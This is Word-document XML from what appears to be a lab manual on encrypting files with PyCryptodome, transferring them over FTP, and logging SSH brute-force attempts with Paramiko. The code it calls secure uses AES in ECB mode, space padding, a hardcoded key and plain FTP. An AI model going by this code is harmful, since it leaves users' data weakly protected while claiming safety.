      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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transferring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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FTP using PyCryptodome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CDF36B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F003BD7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7704A8F4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360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PyCryptodome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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before transferring them over FTP securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2909B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11023672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1CEF665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2736EB68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PyCryptodome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decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F1C4A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1" w:line="280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ftplib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FTP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transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56122CA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72" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FTP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(vsftpd, FileZilla,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services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247274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z w:val="24"/>
        </w:rPr>
        <w:t>Nano,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etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9DD33" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B67DFA5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6AFB88EB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC08041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1: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Install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Required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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A051235" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9857DE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="275" w:lineRule="exact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prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526FA69B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="275" w:lineRule="exact"/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PyCryptodome:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205762AD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53713C92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pycryptodome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2D8FF2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F807C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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installation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464E9D4E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F58E88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"from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Crypto.Cipher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AES;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print('PyCryptodome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installed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>successfully')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7769CA80" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="193"/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2: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Implement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File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Encryption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and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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308A7B33" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA5202E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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script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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>encrypt_decrypt.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D05796" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBCC4ED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DB6ABF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="6526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Crypto.Cipher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AES import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739B197E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202DFD7F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pad(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62BB65" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="840" w:right="2701"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"""Pads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make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block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size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compliant.""" return data + b" " * (16 - len(data) % 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BBC565" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="840" w:right="4437" w:hanging="48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encrypt_file(input_file,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output_file,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key): """Encrypts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encryption.""" cipher = AES.new(key, AES.MODE_ECB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239073E8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="132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open(input_file,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'rb')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f: plaintext = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BB584E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4139"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ciphertext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cipher.encrypt(pad(plaintext)) with open(output_file, 'wb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69379E0C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="132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f.write(ciphertext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B719FD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print(f"File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{input_file}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encrypted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successfully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{output_file}.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CBA68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6237E3CC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4438" w:hanging="48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decrypt_file(input_file,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output_file,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key): """Decrypts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encryption."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152AF5E8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:jc w:val="both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28953B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="840" w:right="522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cipher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AES.new(key,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AES.MODE_ECB) with open(input_file, 'rb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF1CB02" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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ciphertext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f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7605C5A5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>plaintext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cipher.decrypt(ciphertext).rstrip(b"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") with open(output_file, 'wb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567C3470" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact"/>
        <w:ind w:left="132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f.write(plaintext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F4A34C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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print(f"File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{input_file}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decrypted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successfully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{output_file}.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529890E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657BAE08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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D061D7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b"thisisaverysecurekey!"[:16]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="46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Ensure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16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bytes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4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59465563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Encrypt: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encrypt_file("sample.txt",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"sample_encrypted.bin",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pacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A46A076" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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Decrypt: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decrypt_file("sample_encrypted.bin",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"sample_decrypted.txt",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pacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286C57C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="195"/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7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>3: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Implement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Secure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File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</w:rPr>
        <w:t>Transfer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Over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752C7D8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC959E1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ftp_transfer.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0089BDE3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4657B0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089ECF33" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="7261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ftplib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FTP import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F8D1A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B54F369" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="2701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upload_file(ftp_server,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password,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file_path): ftp = FTP(ftp_server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350B0299" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4540"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ftp.login(user=username,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passwd=password) with open(file_path, 'rb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026F8060" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="2222" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ftp.storbinary(f'STOR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{os.path.basename(file_path)}',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f) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ftp.quit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C9FB8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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print(f"Encrypted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{file_path}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uploaded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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>successfully.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A81C34" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4ED6DE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="426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download_file(ftp_server,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password,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remote_filename,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local_path): ftp = FTP(ftp_server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2495C0FE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4540"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ftp.login(user=username,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passwd=password) with open(local_path, 'wb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2019888C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="2222" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ftp.retrbinary(f'RETR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{remote_filename}',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 xml:space="preserve">f.write) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ftp.quit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E982626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print(f"Encrypted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{remote_filename}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downloaded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successfully.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC379F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEEDB54" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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upload_file("ftp.example.com",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"user",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"password",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"sample_encrypted.bin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1960F611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download_file("ftp.example.com",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"user",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"password",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"sample_encrypted.bin", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"downloaded_encrypted.bin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CCA7C5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="196"/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Step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4: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Running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CEFE2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9B773C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64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FTP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transfer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A133C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3100C7DA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encrypt_decrypt.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="45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call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encrypt_file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function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FFD4FC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429A7268" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64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file 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3A23D5BA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCB0129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ftp_transfer.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="46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call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upload_file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function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F84B67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2171692A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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encrypted file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FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC3352" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A99A12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ftp_transfer.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="46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call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download_file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function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8870BE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59F873" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="74"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Decrypt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downloaded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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D1BEF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A457698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encrypt_decrypt.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="45"/>
          <w:w w:val="15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decrypt_file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function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E365BC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1FC29FD6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087A939C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>◻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encrypts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uploading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FTP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decrypts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after downloading, ensuring secure data transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617D8A5B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31B83A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78"/>
        <w:ind w:right="521"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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brute-force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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paramiko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="2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 failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16754384" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="360" w:right="783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Paramiko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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login attempts, helping in the prevention of brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BABEC81" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9CEAA0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07E1ED32" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01554E64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3.x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40AD00C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Paramiko library</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>for SSH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handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4803EA2C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Logging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attack </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B8668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SSH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(OpenSSH,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dropbear,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SSH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services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA01740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z w:val="24"/>
        </w:rPr>
        <w:t>Nano,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etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A8D96E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AA0903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7D286678" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EFF425" w14:textId="77777777" w:rsidR="00A16F47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Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75EE4F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
